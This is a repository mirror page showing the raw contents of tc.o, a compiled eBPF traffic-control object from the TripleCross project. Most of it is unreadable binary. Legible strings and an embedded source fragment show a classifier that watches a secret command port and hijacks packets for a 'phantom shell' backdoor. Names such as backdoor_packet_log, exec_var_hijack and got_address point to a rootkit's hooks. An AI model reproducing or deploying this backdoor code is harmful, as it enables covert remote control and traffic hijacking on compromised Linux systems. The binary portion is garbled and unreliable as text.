admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-17 07:33:07 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
d825d4c8c0575ad1cc9e23beab8b2e466a385fab
TripleCross/apps/tc.o

595 lines
50 KiB
Plaintext
Raw Normal View History

Completed work on deployer, previous to cron persistence
2022-05-16 12:52:25 -04:00
ELF<00><00><>@@<00>aePagL<00>x<00>X<00>s<1A><><00>ETH
c<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>
qq qr dL<00>IP
c<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><00><00><00>y "<00>Y<00>s<1A><><00>x
k<1A><><00> %llc<1A><>datalen:{<1A><>: %llx, {<1A><>lx, data{<1A><>, ip: %l{<1A><>IP CHECK{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>/<00><><00>t<00><00><>qqV<01><><00>q6<00>Q <00>s<1A><><00>K
k<1A><>TCP CHEC{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD> <00><>i<>V @<00>CK
c<1A><>PORT CHE{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD> <00><><00>xk<1A><>_end:%ll{<1A><>lx, data{<1A><> data:%l{<1A><> bounds:{<1A><>Detected{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>*<00>s<00>T<00>cp:%llx
{<1A><>:%llx
t{<1A><>%llx
ip{<1A><>:
eth:{<1A><> headers{<1A><>Detected{<1A><><00>s<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>1<00>s<00><><00><><00>ixqqcX<>iy.<00>u
k<1A><>p_ihl: %{<1A><>4: %u, i{<1A><>cp_doff*{<1A><>n: %u, t{<1A><>ip_totle{<1A><><00>s<1A><>isquit.tT<dT<<00><00><><00><><EFBFBD><EFBFBD><EFBFBD>+<00><00>a<00><00>'t T <<00><1C>a<>X<EFBFBD>dT<<00>
kz<6B><7A>size: %u{<1A><>PAYLOAD {<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><><00><00>{<1A><><00><><00><><EFBFBD><EFBFBD><00><00><00>c<1A><><00>{<1A><>{<1A><>{<1A><>{<1A><>{<1A><>{<1A><>{<1A><>{<1A><>{<1A><>Ukz|<7C><00> yetcx<>T active{p<>shell NO{h<>Phantom {`<60><00><>`<60><><EFBFBD><EFBFBD>1<>a<>V<00>ow
c<1A><> right n{x<>T active{p<>shell NO{h<>Phantom {`<60><00><>`<60><><EFBFBD><EFBFBD>$<1D><00> c<><63><EFBFBD>a<>c<1A><>i<>k<1A><>i<>k<1A><>i<>k<1A><>i<> k<1A><>i<>
k<1A><>i<>k<1A><>i<>k<1A><>i<>k<1A><>i<>k<1A><>i<> k<1A><>i<>k<1A><>i<>k<1A><>i<>k<1A><>i<>(k<1A><>i<>&k<1A><>i<>$k<1A><>i<>"k<1A><>i<>0k<1A><>i<>.k<1A><>i<>,k<1A><>i<>*k<1A><>i<>8k<1A><>i<>6k<1A><>i<>4k<1A><>i<>2k<1A><>i<>@k<1A><>i<>>k<1A><>i<><k<1A><>i<>:k<1A><>i<>Hk<1A><>i<>Fk<1A><>i<>Dk<1A><>i<>Bk<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><00><00><00><>
f <00><><EFBFBD><EFBFBD><EFBFBD>ap
cp<>update m{h<>Fail to {`<60><00><>`<60><><EFBFBD><EFBFBD><00><00>x
k<1A><>P:%x P:%{<1A><>, A:%i I{x<>tive now{p<>shell ac{h<>s<><73><EFBFBD> Phantom {<7B>`<60>i<>a<>a<><00><>`<60><><EFBFBD><EFBFBD>+<00>oad: %s
{x<>ram payl{p<>shell pa{h<>{<7B>`<60><00>s<1A><><00> <00><>`<60><><EFBFBD><EFBFBD>!<00>s<00>a<>c<1A><>i<>k<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>a<00><00><00><00><><00><><EFBFBD><EFBFBD><EFBFBD>a<00>$<00><00>s<>n<EFBFBD><00>u
kl<><00>p: %ch<>offset i{`<60><00><>`<60><><EFBFBD><EFBFBD><00><00>a<><61><EFBFBD>a<><61><EFBFBD><00>a<00><00><00>
f
<00><><EFBFBD><EFBFBD><EFBFBD>s<1A><><00> %d
c<1A><>hecksum:{x<>ute l3 c7<00><><00><><EFBFBD><EFBFBD><EFBFBD>a<00><00><00><00> f<00><><EFBFBD><EFBFBD>ip: %d
{<1A><>ination {x<>ite dest{p<>o overwr{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>(&<00>s<>p<EFBFBD>ort: %u
{h<>offset p{`<60><00><>`<60><><EFBFBD><EFBFBD><00>$<00>i<><69><EFBFBD>i<><69><EFBFBD><00>a<00>2<00><00> f<00><><EFBFBD><EFBFBD>s<EFBFBD><73><EFBFBD><00> %d
c<1A><>hecksum:{x<>ute l4 c{p<>o recomp{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>%<00><00>$<24><00><><00><><EFBFBD><EFBFBD><EFBFBD>a<00>$<00><00><00> f<00><><EFBFBD><EFBFBD><EFBFBD>
k<1A><>port: %d{<1A><>ination {x<>ite dest{p<>o overwr{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>*<00><>ab@<00>a<00><00>&f<00><><EFBFBD><EFBFBD><EFBFBD>s<1A><><00> %d
c<1A><>a tail):{<1A><>cket (vi{x<>e the pa{p<>o enlarg{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>-<00><><00><00>a<00><00>'f <00><><EFBFBD><EFBFBD>s<EFBFBD>t<EFBFBD><00>ata
cp<>o pull d{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD><00>aePadL<00>C<00>S<00>sd<><00>ETH
c`<60><00><>`<60><><EFBFBD><EFBFBD><00><><00>A"<00>Q<00>s<1A><><00>x
k<1A><><00> %llc<1A><>datalen:{<1A><>: %llx, {x<>lx, data{p<>, ip: %l{h<>IP CHECK{`<60><00><>`<60><><EFBFBD><EFBFBD>/<00><00><><00>B6<00>R <00>sj<><00>K
kh<>TCP CHEC{`<60><00><>`<60><><EFBFBD><EFBFBD> <00><><03><><04><><01><>-T<><54>iB.tT<iA<00>!qBdT<!&<01><>?<00>B@<00>%<25><>E<00><05><>@ah<00><><EFBFBD><EFBFBD><EFBFBD> <00>q<0F>q q   <>@<00>q<0F>qq<00><>   <00><><00><><EFBFBD><EFBFBD>&p<>><00>s<1A><>i bytes
{<1A><>riting %{x<>et %i, w{p<>oad offs{h<>New payl{`<60><00><>`<60><><EFBFBD><EFBFBD>)<00><><00><><00><00>a<00><><00>s<00><><00><00> f<00><><EFBFBD><EFBFBD><EFBFBD>s<1A><>oad: %d
{x<>ite payl{p<>o overwr{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>!<19>aePadL<00>C<00>Sg<><00>A"<00>Qn<><00>A6<00>Q<00><>iG<00>@<00>u<00>kZ^<5E>iC<00>a<00><00>T<00><00>
f<00><><EFBFBD><EFBFBD><00><><00>%i
cp<>ot len: {h<>New ip t{`<60>T<00><><00><>`<60><><EFBFBD><EFBFBD><00>s<00><00><>^<5E><><EFBFBD><EFBFBD>a<00><00><00><00> f<00><><EFBFBD><EFBFBD><EFBFBD>
k<1A><><00>: %dc<1A><>otal len{x<>ite ip t{p<>o overwr{h<>Failed t{`<60><00><>`<60><><EFBFBD><EFBFBD>&<00><><00>s<1A><><00>e
k<1A><>g routin{x<>hijackin{p<> packet {h<>Finished{`<60><00><>`<60><><EFBFBD><EFBFBD>#<00><><00>a<>Pa<>L<00>
k<1A><><00>lledc<1A><>ifier ca{<1A><>ss class{<1A><>TC ingre{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><00><><00>g <00>s<1A><><00>ETH
c<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00>+q<> q<> dL<00>IP
c<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><00><>"<00>b<00>s<1A><><00>x
k<1A><><00> %llc<1A><>datalen:{<1A><>: %llx, {<1A><>lx, data{<1A><>, ip: %l{<1A><>IP CHECK{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>/<00>s<00><><00>e<00><00><00>q<><00>s<1A><><00>TCP
<00><><00><>6<00>a <00>s<1A><><00>K
k<1A><>TCP CHEC{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD> <00><00><>{*<2A><>i<>$ #(CK: %u
{<1A><>PORT CHE{<1A><><00><00><><00><><EFBFBD><EFBFBD><EFBFBD><00><00>xk<1A><>_end:%ll{<1A><>lx, data{<1A><> data:%l{<1A><> bounds:{<1A><>Detected{<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>*<00><><00>d<00>cp:%llx
{<1A><>:%llx
t{<1A><>%llx
ip{<1A><>:
eth:{<1A><> headers{<1A><>Detected{<1A><><00>s<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>1<00><><00>ty<><79><EFBFBD><00>i<>{<1A><>q<>c<1A><>i<>.<00>s<1A><><00>u
k<1A><>p_ihl: %{<1A><>4: %u, i{<1A><>cp_doff*{<1A><>n: %u, t{<1A><>ip_totle{<1A><>i<>i<>.tq<>T<dT<<00><00><><00><><EFBFBD><EFBFBD><EFBFBD>+<00>y<><79><EFBFBD>tT<y<><79><EFBFBD><00>q<00>a<><61><EFBFBD>dT<i<>.wW<'<00>1q<00>a"<00>s<1A><><00>x
k<1A><><00>:%llc<1A><>data_end{<1A><>e:%llx, {<1A><>load_siz{<1A><>llx, pay{<1A><>ayload:%{<1A><>CHECK, p{<1A><>PAYLOAD {<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD>?<00>t<00>e<00>P<><00><><00><00>'<00>
k<1A><>size: %u{<1A><>PAYLOAD {<1A><><00><><00><><EFBFBD><EFBFBD><EFBFBD><00>s<00>?<3F>PORT CHECK
offset ip: %u
ETH
TCP
TCP CHECK
Phantom shell NOT active yet
Phantom shell NOT active right now
Fail to update map
Phantom shell active now, A:%i IP:%x P:%x
Phantom shell param payload: %s
Failed to overwrite destination ip: %d
offset port: %u
Failed to recompute l4 checksum: %d
Failed to overwrite destination port: %d
Failed to enlarge the packet (via tail): %d
Failed to pull data
New payload offset %i, writing %i bytes
Failed to overwrite payload: %d
Failed to recompute l3 checksum: %d
New ip tot len: %i
Failed to overwrite ip total len: %d
Finished packet hijacking routine
TC ingress classifier called
IP CHECK, ip: %llx, data: %llx, datalen: %llx
PORT CHECK: %u
Detected bounds: data:%llx, data_end:%llxDetected headers:
eth:%llx
ip:%llx
tcp:%llx
ip_totlen: %u, tcp_doff*4: %u, ip_ihl: %u
PAYLOAD CHECK, payload:%llx, payload_size:%llx, data_end:%llx
PAYLOAD size: %u
GPL<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Q<00>V<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>U<><00>U<>`UPUX`U<>XU<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>W<><00>WPTX<00>T<><00>T<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>W<><00>WPTX<00>T<><00>T<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>ɠ)<29><><00>z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>@XpPSX<00>S<>pS<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>XYXpQ<>Q(<00>t"<22><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>PX8<00>Q<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 1<> <00>z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>P8 X<> hX<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>X
<00>
P<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 0 Q<> @z<><00><00>z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0 P Q<><00>z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>8  z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>8 <00>@<40><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>h 8 z<><00> <00>z<><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0 <00>P<><00>P<>P0PP<00>P<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>X<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>y2!<21><><00>y3!<21><><00>Y<>y1!<21><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>z<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Q`X<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`V<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`Y<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`Y<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>08ɠ)<29>8`z <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`XWh8W<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>RxR<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`<00>S<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00>`W<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>S<><00>S%U4I?: ;I!I7 $> $ > 4I?: ;  : ; I: ; 8
I !I7 I: ; 4I: ; I'I&I4I: ; : ; I: ;8  I: ;<05>8  : ;<05> I: ;8  : ; : ;&I : ; (I : ; I: ; 8 .@<18>B: ; 'I?!: ; I"4: ; I#4: ; I$4: ; I% & U'4: ;I(.@<18>B: ;'I?): ;I*4: ;Iy -Yo@<01> LSx}<07>oP  K <09><00>L <09><00>M <09><00>N <09><00>O
<EFBFBD><03>S<05>
<EFBFBD><03> S
<EFBFBD> <0C><00><05>
<EFBFBD>8 <09>? <09><00>! <09>D" <09>V# V$ <00>%0
L O<00><05>LS+wW q R <09><00>S <09><00>T <09><00>U <09><00>V
<EFBFBD>UH( <09>D) B<00>* O<00>+LS@<07>_ <08> Z <09><00>[ <09><\ <09>N] <09>S^
A<03> S
D
X<08>/ <09><00>0 <09>y1<03>S<08>' <09>O(<00>e l ` <09><00>a <09><b <09>Nc <09><00>d
<EFBFBD>P4 <09><00>5 <09>6SC* +/+4<07>Ko <08>(i <09><00>j <09><00>k <09><00>l <09><00>m <09><00>n
<EFBFBD><08>L <09><00> <09>O <09>/ <09><00>
<07><00>x x s <09><00>t <09><00>u <09><00>v <09>w
!c(<
<00>= <00>> 1<00>? ><00>@ JrA [rB$ <0C>U<07><00><02>  | <09><00>} <09><00>~ <09><00> <09><00><02>
<EFBFBD><08>G <09><00>H<08> <09>* <09><00>  <09>/
 <09>1  <09>8 <05><05>LS O<06>
TelD#
qL,<00>
<EFBFBD>e<0F>D
<EFBFBD>a<00>W>DXBDYKDZPD[ ^D\gD]tD^}D_<14>D` <14>Da$<14>Db(<14>Dc,<14>hd0<14>DeD<14>DfH<14>DgL<14>DhP<14>DiT<14>DlX<14>Dm\<14>Dn`<14>todtpt Dq<10>Dr<10>#Du<10>v<08>v-<00>v<14><00>w<10><14>Dx<10><14>Dy<10>Fz<08>z<14><00>zXD{<10>DSDS
<EFBFBD><13>8<07>7<00><07>C<00><07>I<00><07>T<00><07>a<00><07>o<00><07>x<00><07> <14><00><07>
<14><00><07> <14><00><07><07> <07>'<07><07><14><00><07><14><00><07>P<07> <07><14>t<07><14>t<07><14>D<07>0<14><00><07>4 /= 1\ <0C><00> D<00>
<EFBFBD>OP<07>D<07><14>D<07><14>D<07>^D<07> KD<07><14>D<07>D<07>t<07>+D<07>,D<07>0(D<07>40t<07>88D<07>H>r<07>L k<00> 1
<EFBFBD> <0E> <0F> <0F> 
<EFBFBD>  <00> G
<EFBFBD> e<0F> <0F> <0F> <0F><12><00> <06>
<EFBFBD> e<0F> D<0F> D <0A>
<06>
e<0F>D<0F><0F><0F> <0A>3
<06>
8
e<0F>D<0F> D<0F><12>
<12>o
<06>
t
e<0F>D<0F>O (<1D>(4@ LXdo!|)<1D>.<1D>/<1D>2<1D>3<1D>\<1D>^<1D>b<1D>g<1D>l<1D><00><00><00>%<00>6<00>B<00>P<00>O<07>\dpz
h <08>
V<1F><00>
X<1F><00>
Y <09><00>
` <09><00>
a <09><00>
b <09><00>
c <09><00>
d ^<00>
e <09><00>
f
<09><00>
g <09><00>
h <0C><00>
   <09><00>  <09><00>  <09><00>  <09><00> <1F><00>  <1F><00>  <1F><00> ! <1F><00> " <1F><00> # <1F><00> $ <1F><00> %  <00> &  <00> '  <00> (  <00> 7 <09><00> 8  <00> 9%  /7 ( <00>ZB <18>!{ <18>"<03><>o Y<>#F<00><1A> #<23> 2#W<00><19> #"<00> +c #<23><00> 6 $+><3E>$<24>J?#<23><00> GD#B<00>W<>#<23><00> X<>#<23><00> l<>#<00> rD#a<00> s<>#<23><00> {D#<23><00> zD#<00> }<7D>$<24> wD$
vD$
uD$,
tD#]<
<01><>#<23>@
<01>D$J
<01>D#<23>[
<01><>$g
<01>D%8("<03><>g !6%<25> #<23>g &@&"<03><>g -B%@"<03><>g 8N%h@"<03><>g @Z&0"<03><>g Df&<26>"<03><>g Er&<26>"<03><>g H~&<26>"<03><>g S<>%<25><00>"<02>g \<5C>%P<00>"<02>g c<>%h
X"<02>g n<>& "<02>g p~&<26>"<02>g q<>&<26>"<02>g <>%<25> <00>"<02>g <01><>%h`"<02>g <01><>%@"<02>g <01><>%<25><00>"<02>g <01>f%<25><00>"<02>g <01><>%<25>h"<02>g <01>%<25>x#G
͹%P<00>"<02>g <01>%8<00>"<02>g ۺ%<25>x"<02>g <01><>%`<00>"<02>g <01>%<00>'<02>g &(`ZT  <01>)<29>{  <01>*<00> <01> *4 2*g<00>
<01> *<2A><00> c *+<00> ' *qy
.<01>*<2A><00> 8D*<2A><00>:?&<26>'<02> g  <01>%<25>'<02> g 6%00*<2A>g @&'<02> g B%<25>'<02> g "6%<25>X'<02> g )N%8H'<02> g 0V&@'<02> g 4f&<26>'<02> g 5r&<26>'<02> g 9~%<25>'<02> g <p&<26>'<02> g B<01>LSLS/LS LS LS*LS1LS+LSLSLS$LSLS!LSLS(LSLS%LS-LSLS)LS&LS#
7<08>  <0A> <09> d <0A> <09> d <0A> <09> <00> <0A> 1SLS?<00><00><00><00><00>p8@<00><00>(0p@`8@P<00><00><00><00>
<00> <00> @ H p x <00> <00> <00> <00>  <00> <00> <00> <00><00><00><00>(0X<00>H<00><00> H<00><00>8 8<00>8@`<00>`Ubuntu clang version 12.0.0-3ubuntu1~21.04.2/home/osboxes/TFG/src/ebpf/include/bpf/tc.c/home/osboxes/TFG/src_licensechar__ARRAY_SIZE_TYPE__fs_opentypeintmax_entrieskeylong long unsigned int__u64valuebuffdpidunsigned int__u32program_namefilenameis_sudofs_open_datafs_priv_openexec_var_hijack_activehijack_stateargv0exec_var_hijack_active_dataexec_var_priv_hijack_activebackdoor_packet_log_32last_packet_modifiedtrigger_arrayseq_rawtrigger_32_tbackdoor_packet_log_data_32backdoor_priv_packet_log_32backdoor_packet_log_16src_portunsigned shorttrigger_16_tbackdoor_packet_log_data_16backdoor_priv_packet_log_16backdoor_phantom_shellactived_ipd_portpayloadbackdoor_phantom_shell_datapinningbackdoor_priv_phantom_shellinj_ret_addresslibc_syscall_addressstack_ret_addressrelro_activegot_addressgot_offset__s32paddinginj_ret_address_datainj_priv_ret_addressfs_dir_logdirent_infod_inolong long intd_offd_reclend_typeunsigned chard_namelinux_dirent64fs_dir_log_datafs_priv_dir_logbpf_trace_printklong intbpf_skb_pull_datalenpkt_typemarkqueue_mappingprotocolvlan_presentvlan_tcivlan_protopriorityingress_ifindexifindextc_indexcbhashtc_classiddatadata_endnapi_idfamilyremote_ip4local_ip4remote_ip6local_ip6remote_portlocal_portdata_metaflow_keysnhoff__u16thoffaddr_protois_frag__u8is_first_fragis_encapip_proton_proto__be16sportdportipv4_src__be32ipv4_dstipv6_srcipv6_dstflagsflow_labelbpf_flow_keyststampwire_lengso_segsskbound_dev_ifsrc_ip4src_ip6dst_portdst_ip4dst_ip6staterx_queue_mappingbpf_sockgso_size__sk_buffbpf_map_lookup_elembpf_map_update_elembpf_skb_load_bytesbpf_l3_csum_replacebpf_skb_store_bytesbpf_l4_csum_replacebpf_skb_change_tailIPPROTO_IPIPPROTO_ICMPIPPROTO_IGMPIPPROTO_IPIPIPPROTO_TCPIPPROTO_EGPIPPROTO_PUPIPPROTO_UDPIPPROTO_IDPIPPROTO_TPIPPROTO_DCCPIPPROTO_IPV6IPPROTO_RSVPIPPROTO_GREIPPROTO_ESPIPPROTO_AHIPPROTO_MTPIPPROTO_BEETPHIPPROTO_ENCAPIPPROTO_PIMIPPROTO_COMPIPPROTO_SCTPIPPROTO_UDPLITEIPPROTO_MPLSIPPROTO_ETHERNETIPPROTO_RAWIPPROTO_MPTCPIPPROTO_MAXBPF_ANYBPF_NOEXISTBPF_EXISTBPF_F_LOCKihlversiontostot_lenidfrag_offttlcheck__sum16saddrdaddriphdrsourcedestseqack_seqres1dofffinsynrstpshackurgececwrwindowurg_ptrtcphdrlong unsigned int__uint16_tclassifier_egressclassifier_ingress____fmtps_new_dataskbethh_desth_sourceh_protoethhdriptcppayload_sizeps_dataerrnew_ipnew_dportold_ip_daddrincrement_lenold_dportoffset_tcp_checksumoffset_ip_checksumoffset_dportoffset_ip_daddrretoffsetiipayload_char_lennew_tot_lenoffset_ip_tot_lendest_port<00><>  <00>  @ 6LRY
^ @e Pm z<00> @<00>(<00><00>@<00><00><00><00><00><00><00>8<00><00>@<00>`<00><00> <00> 
   <00><00>@<00><00><00><00>-5H<00>Q ^ @d <00><00>@<00><00><00><00><00>!<00><00><00># <00><00>
"<00> <00><00>@<00><00><00> <00>$'<00><00>) :G (P <00><00>@<00><00><00>&<00>l*-<00>(<00><00>@<00><00><00><00><00>.<00>. <00><00> <00><00>@<00><00><00>,<00>/2&32A4G@M <00>V5<00>]6<00>d@r <00> <00><00>@<00><00><00>1<00><00>7:<00> <04><00><00> <00>@<00>`<00><00><00><00><00><00><00><00><00><00> @`;<00> !@,`1<00>:<00>B<00>I<00>T^< i<<00>s @<00>`=<00><00><00><00><00> ?@<00><00><00>>I<00>@J <00>9<00> A <00>9<00> C vE(  % + 0 8 <00>F<00><00>int__ARRAY_SIZE_TYPE____u64long long unsigned intbackdoor_phantom_shell_dataactived_ipd_portpayloadunsigned intunsigned shortcharbackdoor_priv_phantom_shelltypemax_entrieskeyvaluepinningbackdoor_phantom_shellfs_open_databuffdpidprogram_namefilenameis_sudo__u32fs_priv_openfs_openexec_var_hijack_active_datahijack_stateargv0exec_var_priv_hijack_activeexec_var_hijack_activebackdoor_packet_log_data_32last_packet_modifiedtrigger_arraytrigger_32_tseq_rawbackdoor_priv_packet_log_32backdoor_packet_log_32backdoor_packet_log_data_16trigger_16_tsrc_portbackdoor_priv_packet_log_16backdoor_packet_log_16inj_ret_address_datalibc_syscall_addressstack_ret_addressrelro_activegot_addressgot_offsetpadding__s32inj_priv_ret_addressinj_ret_addressfs_dir_log_datadirent_infolinux_dirent64d_inod_offd_reclend_typed_namelong long intunsigned charfs_priv_dir_logfs_dir_log__sk_bufflenpkt_typemarkqueue_mappingprotocolvlan_presentvlan_tcivlan_protopriorityingress_ifindexifindextc_indexcbhashtc_classiddatadata_endnapi_idfamilyremote_ip4local_ip4remote_ip6local_ip6remote_portlocal_portdata_metatstampwire_lengso_segsgso_sizeflow_keysskskbclassifier_egressclassifier/egress/home/osboxes/TFG/src/ebpf/include/bpf/tc.cint classifier_egress(struct __sk_buff *skb){ void *data_end = (void *)(__u64)skb->data_end; void *data = (void *)(__u64)skb->data; if ((void *)eth + sizeof(struct ethhdr) > data_end){ bpf_printk("ETH\n"); if(eth->h_proto != htons(ETH_P_IP)){ bpf_printk("IP\n");} if ((void *)ip + sizeof(struct iphdr) > data_end){ bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip, data, data_end); if(ip->protocol != IPPROTO_TCP){ if ((void *)tcp + sizeof(struct tcphdr) > data_end){ bpf_printk("TCP CHECK\n"); __u16 src_port = ntohs(tcp->source); if(src_port == CC_CLIENT_SECRET_COMMANDING_PORT_DEFAULT){ bpf_printk("PORT CHECK\n"); bpf_printk("Detected bounds: data:%llx, data_end:%llx", data, data_end); bpf_printk("Detected headers: \n\teth:%llx\n\tip:%llx\n\ttcp:%llx\n", eth, ip, tcp); __u32 payload_size = ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4); bpf_printk("ip_totlen: %u, tcp_doff*4: %u, ip_ihl: %u\n", ntohs(ip->tot_len), tcp->doff*4, ip->ihl*4); bpf_skb_pull_data(skb, 0); bpf_printk("PAYLOAD size: %u\n", payload_size); __u64 key = 1; struct backdoor_phantom_shell_data *ps_data = (struct backdoor_phantom_shell_data*) bpf_map_lookup_elem(&backdoor_phantom_shell, &key); struct backdoor_phantom_shell_data ps_new_data = {0}; if(ps_data == (void*)
<EFBFBD><00><00><00><05><00><00><03><00><00><00><00><03><00><00><00><00>,<00><00>.<11><00><00>.<06><00><00>b<03><00><00><00><00>b<03><00><00><00> <09><00><00><00><05><00><00><00><12><00><00><00><06><00><03>@<00>P<00>,<13>X<00>R<05>h<00><00><00><00><00>p<00><00><00><00><00><00>@<00>KCH<00>K2`<00><00> 8<00><00>@<00><00> P<00> Dh<00>K7<00><00>K*<00><00>KG<00><00>K<<00><00> L<00><00><00><00><00> L<00>O \(<00><00>0<00>_ V`P<00><00> (d<00><00>"
h<00><00><
p8<00>l
<14>@<00>l
<0B>P<00><00>
<03><00><00><00>
<15><00><00><00>
<1E><00><00><00>
<13><00><00><00>
<20><00><00>
<15><00>& <02>
<00><00>
<15>(
<00>d <0C>H
<00>& 1<>X
<00><00> <05>h
<00><00> <03><00>
<00><00> <02><00> <00>Y <02><00> <00><00> <02> <00>Y <02> <00><00> <1A> <00><00> <08>( <00><00> <1D>0 <00><00> <08>@ <00><00> <02>H <00><00> <02>p <00><00> <02>x <00>) <02><00> <00>l <02><00> <00><00> <02><00> <00>l <02> <00><00> 9 <00><00> G <00><00> 0 <00><00> @ <00><00> <00> <00> <00><00> <00> <00>Xh<00><00>,<00><00><00>60<00><00><00>A0<00><00><00>0<00><00><00> 4<00>"8@<00><00><00>^D<00><00><00> H<00><00><00>L<00><00><00>&\<00><00><00>)\<00><00><00>\<00><00><00> `<00><00>(d<00><00>lp<00><00><00>t<00><00><00>x<00><00>!<21><00><00><1D><00><00><12>(<00><00><06>8<00>p<00>.<11><00><00>.<06><00><00>X<00><00><12>h<00><00><06>x<00><00><00> <15><00><00>H<05><00>8<00>H<05>P<00>lX<00>`<00>l<00><00><00>8<00><00><00>8<00><00><00>8<00><00><00>8<00><00><00>4<00><00><00>4<00><00><00>8<00><00><00>8<00><00><00>8<00><00><00>8<00><00>$PP<00>`<00>gd0<00><00> h8<00><00>l<00><00><00>!<21><00><00><00>|<00><00><00><12><00><00><00><06><00><00>.<11><00>.<06><00><00><12>(<00><00><06>H<00><00><16>`<00><00><08>h<00>-:<3A>p<00>-<08><00><00><00> <06><00><00><00><02>(<00><00><08>P<00><00> <06>`<00><03><00>W<00>5<00><00>$<00>E',<00>u#( <00><00>0<00><00><00><00><00>0<00><00><00>D<00><00><00>D<00><00><00> H<00><00><00><00>
T <00><00>T0<00>\@<00>H<00>\`<00>.tp<00>.t<00><00>bx(<00>0<00>bxX<00>,<01>h<00><00> <09>p<00><00><05><00><00><03><00><00><00><12><00><00><00><06><00><00><03><00>)<14> <00>N<05>8<00>y<03><00><00><00><02>H<00><00><02><00><00><00><02><00><00><00><02><00>KC<>(<00>K2<>8<00><00><05><00><00><02> <00><00><05>8<00>K7<>X<00>K*<2A>p<00>KG<><00><00>K<<3C><00><00><00>&<26><00><00><00>*<2A><00><00><00><1F><00><00><00><15><00><00><00><06><00><00><03><00><00> <00><00> 8<00> @<00> zR|  <00>4`.R<01> ebpf/include/bpf/usr/include/asm-genericebpf/include/bpf/../../../common/usr/include/bpf/usr/include/linux/usr/include/netinet/usr/include/x86_64-linux-gnu/bitstc.cdefs.hint-ll64.hc&c.hstruct_common.hbpf_helper_defs.hbpf.htypes.hin.hip.htcp.htypes.hif_ether.h '
"#'.`  ! _X
